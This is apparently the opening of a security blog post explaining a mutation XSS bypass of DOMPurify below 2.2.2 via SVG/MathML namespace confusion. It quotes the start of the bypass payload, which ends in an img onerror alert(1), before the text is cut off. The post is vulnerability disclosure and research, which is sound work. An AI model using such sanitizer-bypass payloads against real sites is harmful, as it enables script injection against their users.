From SVG and back, yet another mutation XSS via namespace confusion for DOMPurify < 2.2.2 bypass by Daniel Santos For those who are only interested in the final payload here you go (I won’t judge). For the ones interested in why it works, please bear with me. <form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1)....
Author
Latest Articles
- BlogDecember 28, 2022Cybersecurity in Education: What Parents, Teachers, and Students Should Know in 2023
- BlogDecember 15, 2022Remembering Leonard Jacobs
- BlogSeptember 30, 2022VPN Security: A Pentester's Guide to VPN Vulnerabilities
- BlogAugust 9, 2022AppSec Tales II | Sign-in
Subscribe
Login
0 Comments